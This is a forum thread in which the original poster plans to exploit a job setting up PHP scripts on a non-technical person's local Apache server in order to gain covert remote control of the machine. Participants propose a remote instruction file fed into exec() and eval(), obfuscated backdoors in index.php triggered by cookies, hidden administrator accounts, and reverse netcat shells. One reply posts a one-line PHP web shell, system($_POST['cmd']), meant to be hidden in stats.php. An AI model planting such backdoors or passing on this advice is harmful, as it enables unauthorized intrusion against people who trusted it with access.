How to take over a computer with PHP

[m0l0ko]

Lets say you are assigned the task of setting up some PHP scripts on the local apache server of a non programming savvy person and you decide to take advantage of the opportunity to gain remote control of the computer. How would you go about doing it?

Heres what I'm thinking: I use file_get_contents to download a .txt file from a remote server. This .txt file will contain instructions, most of the time the first instruction will be DO NOTHING or something, which tells the script to ignore the instructions. Then when I decide to, I will change it to ACTIVE, which will tell the script to read the next few lines which will be commands that get fed into the exec() function. The script will read this instruction file every time it loads (in other words, every time the person on the other end uses my scripts). I will also hook it up to the eval() function so I can feed it blocks of PHP code. Like this I can get the script to do anything, even download and execute a remote administration tool if needs be.

I'm not a very advanced PHP programmer, thats the best I could come up with so far. The downside is that I can only feed instructions to it every time the person runs the script (which in my situation won't be very often). Is there a way I can make the script open up a back door to apache so I can get the remote apache server to run scripts at any time? Is there a way I can gain shell access to the computer?

[relax]

google php shells....

[DaNePaLI]

Well if its the non-programming savvy person, you could even install the remote administration tools initially rather than doing through the PHP script later on. Plus you could add a hidden administrator account and setup the remote desktop connection to the computer.

Or you could hide the obfuscated PHP code somewhere in the file which your end user would access the most (eg. index.php). Something that would trigger based on some POST or COOKIE. Don't use GET (eg. index.php?shell=1 ) as the HTTP logs would keep the full URL with all the query parameters. Easy method would be to use COOKIE (eg. if COOKIE['shell'] is set, the shell access would be given to you).

[m0l0ko]

Well if its the non-programming savvy person, you could even install the remote administration tools initially rather than doing through the PHP script later on. Plus you could add a hidden administrator account and setup the remote desktop connection to the computer.

Or you could hide the obfuscated PHP code somewhere in the file which your end user would access the most (eg. index.php). Something that would trigger based on some POST or COOKIE. Don't use GET (eg. index.php?shell=1 ) as the HTTP logs would keep the full URL with all the query parameters. Easy method would be to use COOKIE (eg. if COOKIE['shell'] is set, the shell access would be given to you).

Yeah I could install a RAT but the problem is I'm not a strong enough programmer to write a crypter so I'd have to use a commercial one, and it would be detected and deleted by his antivirus within a few days unless I regularly recrypted and updated the program. My PHP scripts on the other hand will be ignored by antivirus software (at least I think they will, I'm a linux user so I have very little experience with Windows antiviruses).

Can you elaborate on what you said about $_POST[] and $_COOKIE[]? I read about using $_GET[] to feed commands into a PHP backdoor but his apache web server won't be facing the internet, so I can't point my browser to his IP or anything like that. I could configure his server to face the web and he wouldn't notice but I don't wanna go making his comp vulnerable to hackers. I can think of plenty of ways to take over a web facing apache server in this case, but I'd prefer to keep it as a local web server. How would I use cookies to open a shell? How would I set the value to 'shell' when I want to open the shell?

With the method I mentioned in the OP (getting the script to download a txt file containing instructions, then execute the instructions), the apache server doesn't need to be web facing.

EDIT: Lets say you did make the apache server face the web (so I can access the web page remotely) and I setup a backdoor shell, how would you go about protecting it so that only you can use the shell (and not random skiddies who find the web page)? Would you just password protect it somehow, or is there a better way?

[callahan]

Make a script that will execute your command with shell_exec() passed via POST or whatever you choose.

[Silentz]

For your needs you really need to just download a (clean) PHP Shell and upload it to server. It's kinda long making one if there are plenty available.


Then just reverse connect using NetCat if you have firewall issues.

EDIT: Lets say you did make the apache server face the web (so I can access the web page remotely) and I setup a backdoor shell, how would you go about protecting it so that only you can use the shell (and not random skiddies who find the web page)? Would you just password protect it somehow, or is there a better way?

IP Whitelist:

Code: [Select]

$ipaddress = $_SERVER['REMOTE_ADDR'];

if($ipaddress == 'XXX.XXX.XXX.XXX') {
//Action for allowed IP Addresses
} else {
//Action for all other IP Addresses
echo 'You are not authorized here.';
echo "<br />IP Address: ".$_SERVER['REMOTE_ADDR'];
exit; 
}
And then add your password protect if you want too.

[m0l0ko]

IP Whitelist:

Problem is I change my IP regularly when I restart my router. Is there a way to convert your no-ip hostname into your IP with PHP?

Thanks for the info, I'll look into reverse netcat.

[techb]

End-users do NOT have PHP installed on their shit. Use C or something more common. You will need something more than PHP. Unless you are targeting Linux users, even then you wont get anywhere because of sudo, su, super user shite.

[Silentz]

End-users do NOT have PHP installed on their shit. Use C or something more common. You will need something more than PHP. Unless you are targeting Linux users, even then you wont get anywhere because of sudo, su, super user shite.

OP says: "Lets say you are assigned the task of setting up some PHP scripts on the local apache server"

[callahan]

Problem is I change my IP regularly when I restart my router. Is there a way to convert your no-ip hostname into your IP with PHP?

Thanks for the info, I'll look into reverse netcat.

Instead of making the access based on IP whitelisting make it based on user-agent.

[jay755]

Oops: This would only work when the webserver was internet facing.

Code: [Select]

<?php
system($_POST['cmd']);
?>
Just put that in stats.php or something and enjoy .


Ofcourse this is a very simple example which can be detected very fast, but it will get you going.


If you need any help just let me know.